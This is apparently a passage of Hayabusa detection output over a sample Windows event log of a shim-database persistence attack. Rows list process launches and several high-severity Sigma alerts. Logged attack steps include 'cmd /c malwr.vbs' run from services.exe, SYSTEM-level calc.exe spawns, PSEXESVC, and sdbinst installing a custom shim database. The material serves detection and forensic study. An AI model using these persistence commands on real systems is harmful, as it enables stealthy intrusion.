C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u 